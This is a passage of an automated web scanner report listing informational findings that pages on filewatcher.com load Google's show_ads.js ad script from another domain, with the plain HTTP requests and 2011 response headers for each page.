21.979. http://www.filewatcher.com/b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.1.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.1.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.1.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:32 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "KB5kler7WeBElU9lS1C3Dw"
Content-Length: 16362
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:32 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 736
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wu-wien.ac.at/pub/systems/Op
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.980. http://www.filewatcher.com/b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.1/packages.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.1/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.1/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:32 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "bq7VKL7QwCiJkEpjMt1zKA"
Content-Length: 9810
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:32 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 737
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wu-wien.ac.at/pub/systems/Op
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.981. http://www.filewatcher.com/b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.1/packages/alpha.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.1/packages/alpha.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.1/packages/alpha.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:33 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "1mwyQnIf+X3PvEJ01iLCIA"
Content-Length: 47782
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 744
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wu-wien.ac.at/pub/systems/Op
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.982. http://www.filewatcher.com/b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.3.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.3.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.3.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:30 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "s3HGM6EqoEa95cifl4klKQ"
Content-Length: 15961
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 724
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wu-wien.ac.at/pub/systems/Op
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.983. http://www.filewatcher.com/b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.3/packages.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.3/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.3/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:30 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "7CckzvKE7P2hIrrCjbrHdw"
Content-Length: 10166
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 730
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wu-wien.ac.at/pub/systems/Op
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.984. http://www.filewatcher.com/b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.3/packages/hppa.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.3/packages/hppa.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.3/packages/hppa.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:31 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "uxo7/vPMoxripOhfYIEApw"
Content-Length: 48516
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:31 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 733
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wu-wien.ac.at/pub/systems/Op
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.985. http://www.filewatcher.com/m/aub-0-2.0.5-10.noarch.hdr.1690.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-0-2.0.5-10.noarch.hdr.1690.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-0-2.0.5-10.noarch.hdr.1690.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:48 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "QQml4ktaVHbqcfZUpXtwYA"
Content-Length: 17403
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 778
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-0-2.0.5-10.noarch.hdr - FTP
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.986. http://www.filewatcher.com/m/aub-2.0.5-10.noarch.rpm.73595.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5-10.noarch.rpm.73595.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5-10.noarch.rpm.73595.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:49 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "kb4TXdSKnZ1h8CU+CKDojw"
Content-Length: 17576
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:49 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 777
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5-10.noarch.rpm - FTP Mi
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.987. http://www.filewatcher.com/m/aub-2.0.5-10.src.rpm.82336.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5-10.src.rpm.82336.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5-10.src.rpm.82336.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:50 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "LM9OvRRHsvjVQOMUmCquMw"
Content-Length: 16844
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 797
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5-10.src.rpm - FTP Mirro
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.988. http://www.filewatcher.com/m/aub-2.0.5.tgz.20.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5.tgz.20.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.20.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:25 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "0A95pkRUYm45gupQF4bVRg"
Content-Length: 22773
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 772
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.989. http://www.filewatcher.com/m/aub-2.0.5.tgz.32459.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5.tgz.32459.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32459.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:21 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "/ffMyujUnh/9Jd7V+CQhhQ"
Content-Length: 19384
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 772
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.990. http://www.filewatcher.com/m/aub-2.0.5.tgz.32461.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5.tgz.32461.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32461.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:36 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "wGhl6cEsFXKOoMN1Y2Fi+g"
Content-Length: 19552
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 777
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.991. http://www.filewatcher.com/m/aub-2.0.5.tgz.32462.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5.tgz.32462.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32462.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:38 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "lNEQmr3IejFLBeSLsNGCcA"
Content-Length: 19279
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 778
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.992. http://www.filewatcher.com/m/aub-2.0.5.tgz.32465.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5.tgz.32465.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32465.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:35 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "envM1eLceR86ygBGGbUowA"
Content-Length: 19849
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 777
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.993. http://www.filewatcher.com/m/aub-2.0.5.tgz.32466.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5.tgz.32466.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32466.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:20 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "4GpI7BCi/0IfwFWZf3oDpw"
Content-Length: 19492
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:20 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 770
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.994. http://www.filewatcher.com/m/aub-2.0.5.tgz.32467.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5.tgz.32467.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32467.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:18 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ARojwTn+kWooNUMrINf0eg"
Content-Length: 19159
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 766
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.995. http://www.filewatcher.com/m/aub-2.0.5.tgz.32468.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub-2.0.5.tgz.32468.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32468.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:30 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "bIM+O2jPLbkd3cE+/479XA"
Content-Length: 19636
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 774
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.996. http://www.filewatcher.com/m/aub-2.0.5.tgz.32469.0.0.html

Summary

Severity:   Information
Confidence:   Certain
